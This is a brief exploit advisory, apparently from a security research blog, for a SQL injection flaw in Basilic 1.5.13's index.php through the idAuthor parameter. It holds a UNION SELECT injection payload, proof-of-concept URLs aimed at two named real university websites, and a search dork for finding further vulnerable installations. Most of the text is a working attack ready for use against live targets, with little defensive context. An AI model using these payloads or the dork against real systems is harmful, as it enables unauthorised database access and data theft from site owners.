Basilic 1.5.13 SQL Injection Vuln


[o] Basilic 1.5.13 SQL Injection Vulnerability
Software : Basilic version 1.5.13
Vendor   : http://artis.imag.fr/Software/Basilic/
Download : http://artis.imag.fr/Software/Basilic/basilic-1.5.13.tar.gz
Author   : NoGe


[o] Vulnerable file
index.php


[o] Exploit
http://localhost/[path]/index.php?idAuthor=[SQL]


[o] Proof of concept
http://secure.ntsg.umt.edu/publications/index.php?idAuthor=-31+union+select+1,version()--
http://www.iarc.uaf.edu/publications/index.php?idAuthor=-19+union+select+1,version()--


[o] Dork
"Powered by Basilic"

Research Blog

Search This Blog

LFI to RCE via access_log injection

Basilic 1.5.13 SQL Injection Vuln

Comments